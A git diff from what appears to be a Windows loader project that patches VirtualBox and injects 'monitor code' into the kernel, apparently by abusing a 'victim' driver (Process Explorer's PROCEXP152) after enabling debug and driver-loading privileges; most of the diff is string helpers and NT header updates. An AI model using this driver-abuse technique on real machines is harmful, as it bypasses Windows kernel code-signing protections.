+ printf_s("LDR: Cannot copy VBoxDD to the temp folder, error %lu\r\n", GetLastError());
+ break;
+ }
+
+ TABLE_DESC localTable;
+
+ localTable.DDTablePointer = NULL;
+ localTable.DDTableSize = 0;
+ if (ProcessVirtualBoxFile(szTempFile, &localTable.DDTablePointer, &localTable.DDTableSize) == 0) {
+
+ if (localTable.DDTableSize > MAX_CONFIGURATION_DATA_SIZE) {
+ printf_s("LDR: Patch data size %lu exceed data size limit %lu\r\n",
+ localTable.DDTableSize,
+ MAX_CONFIGURATION_DATA_SIZE);
+ }
+ else {
+ g_PatchData.DDTablePointer = localTable.DDTablePointer;
+ g_PatchData.DDTableSize = localTable.DDTableSize;
+ bResult = TRUE;
+ }
+ }
+ else {
+ printf_s("LDR: Error while processing VBoxDD file\r\n");
+ }
+
+ //
+ // Remove nyan.dll from %temp%.
+ //
+ DeleteFile(szTempFile);
+ }
+ else {
+ printf_s("LDR: Could not expand environment variable for temp directory\r\n");
+ }
+
+ } while (FALSE);
+
+ if (hKey) {
+ RegCloseKey(hKey);
+ }
+
+ return bResult;
+}
+
+/*
+* ListTokenPrivileges
+*
+* Purpose:
+*
+* List all available privileges of current process token.
+*
+*/
+VOID ListTokenPrivileges()
+{
+ PTOKEN_PRIVILEGES pTokenPrivs;
+ HANDLE TokenHandle = supGetCurrentProcessToken();
+
+ WCHAR szPrivName[MAX_PATH + 1];
+ ULONG cchName;
+
+ BOOLEAN Enabled, EnabledByDefault;
+
+ printf_s(T_PRNTDEFAULT, "LDR: Listing process token privileges...");
+
+ if (TokenHandle) {
+
+ pTokenPrivs = (PTOKEN_PRIVILEGES)supGetTokenInfo(TokenHandle,
+ TokenPrivileges,
+ NULL);
+
+ if (pTokenPrivs) {
+
+ for (ULONG i = 0; i < pTokenPrivs->PrivilegeCount; i++) {
+
+ //
+ // Output privilege flags like Process Explorer.
+ //
+ szPrivName[0] = 0;
+ cchName = MAX_PATH;
+ if (LookupPrivilegeName(NULL, &pTokenPrivs->Privileges[i].Luid,
+ szPrivName, &cchName))
+ {
+ Enabled = pTokenPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED;
+ EnabledByDefault = pTokenPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT;
+
+ printf_s("LDR: %ws %s %s\r\n",
+ szPrivName,
+ Enabled ? "Enabled" : "Disabled",
+ EnabledByDefault ? "(Default Enabled)" : "");
+
+ }
+
+ }
+
+ supHeapFree(pTokenPrivs);
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "[!] Could not query token privileges");
+ }
+ NtClose(TokenHandle);
+ }
+
+}
+
+/*
+* AssignPrivileges
+*
+* Purpose:
+*
+* Assign required privileges.
+*
+*/
+BOOLEAN AssignPrivileges(
+ _In_ BOOLEAN IsDebugRequired
+)
+{
+ NTSTATUS ntStatus;
+
+ if (IsDebugRequired) {
+ ntStatus = supEnablePrivilege(SE_DEBUG_PRIVILEGE, TRUE);
+ if (!NT_SUCCESS(ntStatus)) {
+ printf_s("[!] Abort: SeDebugPrivilege is not assigned! NTSTATUS (0x%lX)\r\n", ntStatus);
+ return FALSE;
+ }
+ }
+
+ ntStatus = supEnablePrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE);
+ if (!NT_SUCCESS(ntStatus)) {
+ printf_s("[!] Abort: SeLoadDriverPrivilege is not assigned! NTSTATUS (0x%lX)\r\n", ntStatus);
+ return FALSE;
+ }
+
+ return TRUE;
+}
+
+/*
+* VBoxLdrMain
+*
+* Purpose:
+*
+* Program main.
+*
+*/
+int VBoxLdrMain(
+ VOID
+)
+{
+ BOOL bCustomTableAllocated = FALSE;
+ LONG x;
+ ULONG dataLength = 0;
+ PVOID DataBufferDD = NULL;
+ WCHAR szParameter[MAX_PATH * 2];
+
+ OSVERSIONINFO osv;
+
+ printf_s("[>] Entering %s\r\n", __FUNCTION__);
+
+#ifdef _DEBUG
+ printf_s(T_PRNTDEFAULT, "[!] Debug build!");
+#endif
+
+ do {
+
+ //
+ // Check number of instances running.
+ //
+ x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
+ if (x > 1) {
+ break;
+ }
+
+ //
+ // Check OS version.
+ //
+ RtlSecureZeroMemory(&osv, sizeof(osv));
+ osv.dwOSVersionInfoSize = sizeof(osv);
+ RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
+ if (osv.dwMajorVersion < 6) {
+ printf_s(T_PRNTDEFAULT, "LDR: This operation system version is not supported");
+ break;
+ }
+
+ if (!supUserIsFullAdmin()) {
+ printf_s(T_PRNTDEFAULT, "[!] No administrator rights or runs not elevated, program will fail");
+ }
+ else {
+ ListTokenPrivileges();
+ }
+
+ ShowVirtualBoxVersion();
+
+ CHAR szVersion[100];
+
+ StringCchPrintfA(szVersion, 100,
+ "LDR: Windows version: %u.%u build %u",
+ osv.dwMajorVersion,
+ osv.dwMinorVersion,
+ osv.dwBuildNumber);
+
+ printf_s(T_PRNTDEFAULT, szVersion);
+
+ g_MaximumUserModeAddress = supQueryMaximumUserModeAddress();
+ printf_s("LDR: Maximum User Mode address 0x%llX\r\n", g_MaximumUserModeAddress);
+
+ BOOLEAN hvciEnabled;
+ BOOLEAN hvciStrict;
+ BOOLEAN hvciIUM;
+
+ //
+ // Provider is not HVCI compatible.
+ //
+ if (supQueryHVCIState(&hvciEnabled, &hvciStrict, &hvciIUM)) {
+
+ if (hvciEnabled) {
+ printf_s(T_PRNTDEFAULT, "[!] Windows HVCI mode detected - this is unsupported");
+ break;
+ }
+
+ }
+
+ //
+ // Parse command line, can only be /s /c or /?
+ //
+
+ //
+ // Stop
+ //
+ if (supGetCommandLineOption(TEXT("/s"),
+ FALSE,
+ NULL,
+ 0))
+ {
+ printf_s(T_PRNTDEFAULT, "LDR: Monitor stop selected");
+
+ if (AssignPrivileges(FALSE)) {
+ VictimRelease((LPWSTR)PROCEXP152);
+ printf_s(T_PRNTDEFAULT, "LDR: Purging system cache");
+ supPurgeSystemCache();
+ }
+ break;
+ }
+ else {
+ //
+ // Custom table.
+ //
+ if (supGetCommandLineOption(TEXT("/c"),
+ TRUE,
+ szParameter,
+ sizeof(szParameter) / sizeof(WCHAR)))
+ {
+ dataLength = 0;
+ DataBufferDD = FetchCustomPatchData(szParameter, &dataLength);
+ if ((DataBufferDD != NULL) && (dataLength > 0)) {
+ g_PatchData.DDTablePointer = DataBufferDD;
+ g_PatchData.DDTableSize = dataLength;
+ bCustomTableAllocated = TRUE;
+ printf_s(T_PRNTDEFAULT, "LDR: Custom patch table loaded");
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Error reading specfied file");
+ break;
+ }
+
+ }
+ else {
+ //
+ // Help.
+ //
+ if (supGetCommandLineOption(TEXT("/?"),
+ FALSE,
+ NULL,
+ 0))
+ {
+ printf_s(T_PRNTDEFAULT, T_HELP);
+ break;
+ }
+ }
+ }
+
+
+ //
+ // Check if custom patch table present. If not - attempt to create own. Exit on failure.
+ //
+ if (bCustomTableAllocated == FALSE) {
+ if (CreatePatchTable()) {
+ printf_s(T_PRNTDEFAULT, "LDR: Patch table created");
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Could not load patch table");
+ break;
+ }
+ }
+
+#ifndef _DEBUG
+ //
+ // Check if any VBox instances are running, they must be closed before our usage.
+ //
+ if (supProcessExist(L"VirtualBox.exe")) {
+ printf_s(T_PRNTDEFAULT, "LDR: VirtualBox is running, close it before");
+ break;
+ }
+#endif
+
+ if (AssignPrivileges(TRUE)) {
+
+ if (!MapTsugumi(&g_PatchData)) {
+ printf_s(T_PRNTDEFAULT, "LDR: Cannot inject monitor code");
+ break;
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Monitor code injected and executed");
+ printf_s(T_PRNTDEFAULT, "LDR: Purging system cache");
+ supPurgeSystemCache();
+ }
+
+ }
+
+ } while (FALSE);
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+ InterlockedDecrement((PLONG)&g_lApplicationInstances);
+ return 1;
+}
+
+
+/*
+* main
+*
+* Purpose:
+*
+* Program entry point.
+*
+*/
+int main()
+{
+ HeapSetInformation(NULL, HeapEnableTerminationOnCorruption, NULL, 0);
+
+ printf_s(T_PRNTDEFAULT, T_PROGRAMTITLE);
+
+ return VBoxLdrMain();
+}
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strcat.c b/Source/Zekamashi_v2/loader/minirtl/_strcat.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strcat.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcat.c
diff --git a/Source/Zekamashi_v2/loader/minirtl/_strcmp.c b/Source/Zekamashi_v2/loader/minirtl/_strcmp.c
new file mode 100644
index 0000000..fc35624
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/minirtl/_strcmp.c
@@ -0,0 +1,47 @@
+#include "rtltypes.h"
+
+int _strcmp_a(const char *s1, const char *s2)
+{
+ char c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = *s1;
+ c2 = *s2;
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
+
+int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
+{
+ wchar_t c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = *s1;
+ c2 = *s2;
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
diff --git a/Source/Zekamashi/loader/minirtl/_strcmpi.c b/Source/Zekamashi_v2/loader/minirtl/_strcmpi.c
similarity index 100%
rename from Source/Zekamashi/loader/minirtl/_strcmpi.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcmpi.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strcpy.c b/Source/Zekamashi_v2/loader/minirtl/_strcpy.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strcpy.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcpy.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strend.c b/Source/Zekamashi_v2/loader/minirtl/_strend.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strend.c
rename to Source/Zekamashi_v2/loader/minirtl/_strend.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strlen.c b/Source/Zekamashi_v2/loader/minirtl/_strlen.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strlen.c
rename to Source/Zekamashi_v2/loader/minirtl/_strlen.c
diff --git a/Source/Zekamashi_v2/loader/minirtl/_strncpy.c b/Source/Zekamashi_v2/loader/minirtl/_strncpy.c
new file mode 100644
index 0000000..f3a519b
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/minirtl/_strncpy.c
@@ -0,0 +1,45 @@
+#include "rtltypes.h"
+
+char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
+{
+ char *p;
+
+ if ( (dest==0) || (src==0) || (ccdest==0) )
+ return dest;
+
+ ccdest--;
+ p = dest;
+
+ while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
+ *p = *src;
+ p++;
+ src++;
+ ccdest--;
+ ccsrc--;
+ }
+
+ *p = 0;
+ return dest;
+}
+
+wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
+{
+ wchar_t *p;
+
+ if ( (dest==0) || (src==0) || (ccdest==0) )
+ return dest;
+
+ ccdest--;
+ p = dest;
+
+ while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
+ *p = *src;
+ p++;
+ src++;
+ ccdest--;
+ ccsrc--;
+ }
+
+ *p = 0;
+ return dest;
+}
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/cmdline.c b/Source/Zekamashi_v2/loader/minirtl/cmdline.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/cmdline.c
rename to Source/Zekamashi_v2/loader/minirtl/cmdline.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/cmdline.h b/Source/Zekamashi_v2/loader/minirtl/cmdline.h
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/cmdline.h
rename to Source/Zekamashi_v2/loader/minirtl/cmdline.h
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/minirtl.h b/Source/Zekamashi_v2/loader/minirtl/minirtl.h
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/minirtl.h
rename to Source/Zekamashi_v2/loader/minirtl/minirtl.h
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/rtltypes.h b/Source/Zekamashi_v2/loader/minirtl/rtltypes.h
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/rtltypes.h
rename to Source/Zekamashi_v2/loader/minirtl/rtltypes.h
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/ultohex.c b/Source/Zekamashi_v2/loader/minirtl/ultohex.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/ultohex.c
rename to Source/Zekamashi_v2/loader/minirtl/ultohex.c
diff --git a/Source/Kasumi/VBoxPatchGen/ntos.h b/Source/Zekamashi_v2/loader/ntdll/ntos.h
similarity index 92%
rename from Source/Kasumi/VBoxPatchGen/ntos.h
rename to Source/Zekamashi_v2/loader/ntdll/ntos.h
index 2f1516e..acada23 100644
--- a/Source/Kasumi/VBoxPatchGen/ntos.h
+++ b/Source/Zekamashi_v2/loader/ntdll/ntos.h
@@ -1,12 +1,13 @@
/************************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2018, translated from Microsoft sources/debugger
+* (C) COPYRIGHT AUTHORS, 2015 - 2020
+* Translated from Microsoft sources/debugger or mentioned elsewhere.
*
* TITLE: NTOS.H
*
-* VERSION: 1.98
+* VERSION: 1.127
*
-* DATE: 28 Dec 2018
+* DATE: 04 Feb 2020
*
* Common header file for the ntos API functions and definitions.
*
@@ -28,6 +29,7 @@
#ifndef NTOS_RTL
#define NTOS_RTL
+
//
// NTOS_RTL HEADER BEGIN
//
@@ -39,6 +41,7 @@ extern "C" {
#pragma comment(lib, "ntdll.lib")
#pragma warning(push)
+#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
#ifndef PAGE_SIZE
@@ -78,6 +81,20 @@ typedef unsigned char UCHAR;
typedef CCHAR KPROCESSOR_MODE;
typedef UCHAR KIRQL;
typedef KIRQL *PKIRQL;
+typedef ULONG CLONG;
+typedef LONG KPRIORITY;
+typedef short CSHORT;
+typedef ULONGLONG REGHANDLE, *PREGHANDLE;
+typedef PVOID *PDEVICE_MAP;
+typedef PVOID PHEAD;
+typedef struct _IO_TIMER* PIO_TIMER;
+
+#ifndef _WIN32_WINNT_WIN10
+#define _WIN32_WINNT_WIN10 0x0A00
+#endif
+#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)
+typedef PVOID PMEM_EXTENDED_PARAMETER;
+#endif
#ifndef IN_REGION
#define IN_REGION(x, Base, Size) (((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && \
@@ -163,26 +180,26 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
}
#endif
+#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES
#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
{ sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
+#endif
// This synonym is more appropriate for initializing what isn't actually const.
+#ifndef RTL_INIT_OBJECT_ATTRIBUTES
#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
+#endif
//
// ntdef.h end
//
-
+#ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))
-#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
-
+#endif
-typedef ULONG CLONG;
-typedef LONG KPRIORITY;
-typedef short CSHORT;
-typedef ULONGLONG REGHANDLE, *PREGHANDLE;
-typedef PVOID *PDEVICE_MAP;
-typedef PVOID PHEAD;
+#ifndef RtlPointerToOffset
+#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
+#endif
//
// Valid values for the OBJECT_ATTRIBUTES.Attributes field
@@ -203,6 +220,21 @@ typedef PVOID PHEAD;
#define CALLBACK_MODIFY_STATE 0x0001
#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )
+//
+// CompositionSurface Access Rights
+//
+#ifndef COMPOSITIONSURFACE_READ
+#define COMPOSITIONSURFACE_READ 0x0001L
+#endif
+
+#ifndef COMPOSITIONSURFACE_WRITE
+#define COMPOSITIONSURFACE_WRITE 0x0002L
+#endif
+
+#ifndef COMPOSITIONSURFACE_ALL_ACCESS
+#define COMPOSITIONSURFACE_ALL_ACCESS (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE)
+#endif
+
//
// Debug Object Access Rights
//
@@ -286,22 +318,22 @@ typedef PVOID PHEAD;
//
#define THREAD_ALERT (0x0004)
-#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001
-#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002
-#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
+#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001
+#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002
+#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
-#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
-#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
+#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
+#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
//
// Worker Factory Object Access Rights
//
-#define WORKER_FACTORY_RELEASE_WORKER 0x0001
-#define WORKER_FACTORY_WAIT 0x0002
-#define WORKER_FACTORY_SET_INFORMATION 0x0004
-#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
-#define WORKER_FACTORY_READY_WORKER 0x0010
-#define WORKER_FACTORY_SHUTDOWN 0x0020
+#define WORKER_FACTORY_RELEASE_WORKER 0x0001
+#define WORKER_FACTORY_WAIT 0x0002
+#define WORKER_FACTORY_SET_INFORMATION 0x0004
+#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
+#define WORKER_FACTORY_READY_WORKER 0x0010
+#define WORKER_FACTORY_SHUTDOWN 0x0020
#define WORKER_FACTORY_ALL_ACCESS ( \
STANDARD_RIGHTS_REQUIRED | \
@@ -334,6 +366,7 @@ typedef PVOID PHEAD;
#define TRACELOG_CREATE_INPROC 0x0200
#define TRACELOG_ACCESS_REALTIME 0x0400
#define TRACELOG_REGISTER_GUIDS 0x0800
+#define TRACELOG_JOIN_GROUP 0x1000
//
// Memory Partition Object Access Rights
@@ -361,14 +394,22 @@ typedef PVOID PHEAD;
//
// Define special ByteOffset parameters for read and write operations
//
+#ifndef FILE_WRITE_TO_END_OF_FILE
#define FILE_WRITE_TO_END_OF_FILE 0xffffffff
+#endif
+#ifndef FILE_USE_FILE_POINTER_POSITION
#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe
+#endif
//
// This is the maximum MaximumLength for a UNICODE_STRING.
//
+#ifndef MAXUSHORT
#define MAXUSHORT 0xffff
+#endif
+#ifndef MAX_USTRING
#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )
+#endif
typedef struct _EX_RUNDOWN_REF {
union
@@ -400,8 +441,7 @@ typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
-} UNICODE_STRING;
-typedef UNICODE_STRING *PUNICODE_STRING;
+} UNICODE_STRING, *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#ifndef STATIC_UNICODE_STRING
@@ -524,7 +564,7 @@ typedef enum _KWAIT_REASON {
WrDelayExecution,
WrSuspended,
WrUserRequest,
- WrEventPair,
+ WrEventPair, //has no effect after 7
WrQueue,
WrLpcReceive,
WrLpcReply,
@@ -549,6 +589,7 @@ typedef enum _KWAIT_REASON {
WrRundown,
WrAlertByThreadId,
WrDeferredPreempt,
+ WrPhysicalFault,
MaximumWaitReason
} KWAIT_REASON;
@@ -757,9 +798,11 @@ typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {
BOOLEAN HvciStrictMode : 1;
BOOLEAN DebugEnabled : 1;
BOOLEAN FirmwarePageProtection : 1;
- BOOLEAN SpareFlags : 1;
+ BOOLEAN EncryptionKeyAvailable : 1;
+ BOOLEAN SpareFlags : 2;
BOOLEAN TrustletRunning : 1;
- BOOLEAN SpareFlags2 : 1;
+ BOOLEAN HvciDisableAllowed : 1;
+ BOOLEAN SpareFlags2 : 6;
BOOLEAN Spare0[6];
ULONGLONG Spare1;
} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;
@@ -859,10 +902,12 @@ typedef enum _PROCESSINFOCLASS {
ProcessSystemResourceManagement = 91,
ProcessSequenceNumber = 92,
ProcessLoaderDetour = 93,
- ProcessSecurityDomainInformation = 93,
- ProcessCombineSecurityDomainsInformation = 94,
- ProcessEnableLogging = 95,
- ProcessLeapSecondInformation = 96,
+ ProcessSecurityDomainInformation = 94,
+ ProcessCombineSecurityDomainsInformation = 95,
+ ProcessEnableLogging = 96,
+ ProcessLeapSecondInformation = 97,
+ ProcessFiberShadowStackAllocation = 98,
+ ProcessFreeFiberShadowStackAllocation = 99,
MaxProcessInfoClass
} PROCESSINFOCLASS;
@@ -982,6 +1027,18 @@ typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
+//
+// Process/Thread System and User Time
+// NtQueryInformationProcess using ProcessTimes
+// NtQueryInformationThread using ThreadTimes
+//
+typedef struct _KERNEL_USER_TIMES {
+ LARGE_INTEGER CreateTime;
+ LARGE_INTEGER ExitTime;
+ LARGE_INTEGER KernelTime;
+ LARGE_INTEGER UserTime;
+} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES;
+
typedef enum _PS_MITIGATION_OPTION {
PS_MITIGATION_OPTION_NX,
PS_MITIGATION_OPTION_SEHOP,
@@ -1469,45 +1526,64 @@ typedef enum _SYSTEM_INFORMATION_CLASS {
SystemCodeIntegrityUnlockModeInformation = 205,
SystemLeapSecondInformation = 206,
SystemFlags2Information = 207,
+ SystemSecurityModelInformation = 208,
+ SystemCodeIntegritySyntheticCacheInformation = 209,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
- struct {
- ULONG BpbEnabled : 1;
- ULONG BpbDisabledSystemPolicy : 1;
- ULONG BpbDisabledNoHardwareSupport : 1;
- ULONG SpecCtrlEnumerated : 1;
- ULONG SpecCmdEnumerated : 1;
- ULONG IbrsPresent : 1;
- ULONG StibpPresent : 1;
- ULONG SmepPresent : 1;
- ULONG SpeculativeStoreBypassDisableAvailable : 1;
- ULONG SpeculativeStoreBypassDisableSupported : 1;
- ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
- ULONG SpeculativeStoreBypassDisabledKernel : 1;
- ULONG SpeculativeStoreBypassDisableRequired : 1;
- ULONG BpbDisabledKernelToUser : 1;
- ULONG SpecCtrlRetpolineEnabled : 1;
- ULONG SpecCtrlImportOptimizationEnabled : 1;
- ULONG Reserved : 16;
- } SpeculationControlFlags;
+ union {
+ ULONG Flags;
+ struct {
+ ULONG BpbEnabled : 1;
+ ULONG BpbDisabledSystemPolicy : 1;
+ ULONG BpbDisabledNoHardwareSupport : 1;
+ ULONG SpecCtrlEnumerated : 1;
+ ULONG SpecCmdEnumerated : 1;
+ ULONG IbrsPresent : 1;
+ ULONG StibpPresent : 1;
+ ULONG SmepPresent : 1;
+ ULONG SpeculativeStoreBypassDisableAvailable : 1;
+ ULONG SpeculativeStoreBypassDisableSupported : 1;
+ ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
+ ULONG SpeculativeStoreBypassDisabledKernel : 1;
+ ULONG SpeculativeStoreBypassDisableRequired : 1;
+ ULONG BpbDisabledKernelToUser : 1;
+ ULONG SpecCtrlRetpolineEnabled : 1;
+ ULONG SpecCtrlImportOptimizationEnabled : 1;
+ ULONG EnhancedIbrs : 1;
+ ULONG HvL1tfStatusAvailable : 1;
+ ULONG HvL1tfProcessorNotAffected : 1;
+ ULONG HvL1tfMigitationEnabled : 1;
+ ULONG HvL1tfMigitationNotEnabled_Hardware : 1;
+ ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;
+ ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;
+ ULONG EnhancedIbrsReported : 1;
+ ULONG MdsHardwareProtected : 1;
+ ULONG MbClearEnabled : 1;
+ ULONG MbClearReported : 1;
+ ULONG Reserved : 5;
+ } SpeculationControlFlags;
+ };
} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {
- struct {
- ULONG KvaShadowEnabled : 1;
- ULONG KvaShadowUserGlobal : 1;
- ULONG KvaShadowPcid : 1;
- ULONG KvaShadowInvpcid : 1;
- ULONG KvaShadowRequired : 1;
- ULONG KvaShadowRequiredAvailable : 1;
- ULONG InvalidPteBit : 6;
- ULONG L1DataCacheFlushSupported : 1;
- ULONG L1TerminalFaultMitigationPresent : 1;
- ULONG Reserved : 18;
- } KvaShadowFlags;
+ union {
+ ULONG Flags;
+ struct {
+ ULONG KvaShadowEnabled : 1;
+ ULONG KvaShadowUserGlobal : 1;
+ ULONG KvaShadowPcid : 1;
+ ULONG KvaShadowInvpcid : 1;
+ ULONG KvaShadowRequired : 1;
+ ULONG KvaShadowRequiredAvailable : 1;
+ ULONG InvalidPteBit : 6;
+ ULONG L1DataCacheFlushSupported : 1;
+ ULONG L1TerminalFaultMitigationPresent : 1;
+ ULONG Reserved : 18;
+ } KvaShadowFlags;
+ };
} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
@@ -1729,6 +1805,10 @@ typedef enum _FILE_INFORMATION_CLASS {
FileMemoryPartitionInformation,
FileStatLxInformation,
FileCaseSensitiveInformation,
+ FileLinkInformationEx,
+ FileLinkInformationExBypassAccessCheck,
+ FileStorageReserveIdInformation,
+ FileCaseSensitiveInformationForceAccessCheck,
FileMaximumInformation
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
@@ -1746,6 +1826,7 @@ typedef enum _FSINFOCLASS {
FileFsSectorSizeInformation,
FileFsDataCopyInformation,
FileFsMetadataSizeInformation,
+ FileFsFullSizeInformationEx,
FileFsMaximumInformation
} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;
@@ -2632,7 +2713,8 @@ typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
#define SE_INC_WORKING_SET_PRIVILEGE (33L)
#define SE_TIME_ZONE_PRIVILEGE (34L)
#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)
-#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE
+#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L)
+#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE
//
// Generic test for success on any status value (non-negative numbers
@@ -3190,10 +3272,10 @@ typedef struct _OBJECT_TYPE_RS2 {
*/
typedef struct _OBJECT_HEADER {
- LONG PointerCount;
+ LONG_PTR PointerCount;
union
{
- LONG HandleCount;
+ LONG_PTR HandleCount;
PVOID NextToFree;
};
EX_PUSH_LOCK Lock;
@@ -3527,6 +3609,8 @@ enum _KOBJECTS {
#define DO_POWER_NOOP 0x00008000
#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs
#define DO_XIP 0x00020000
+#define DO_DEVICE_TO_BE_RESET 0x04000000
+#define DO_DAX_VOLUME 0x10000000
#define FILE_REMOVABLE_MEDIA 0x00000001
#define FILE_READ_ONLY_DEVICE 0x00000002
@@ -3620,6 +3704,15 @@ enum _KOBJECTS {
#define FILE_DEVICE_SYSENV 0x00000052
#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053
#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054
+#define FILE_DEVICE_STORAGE_REPLICATION 0x00000055
+#define FILE_DEVICE_TRUST_ENV 0x00000056
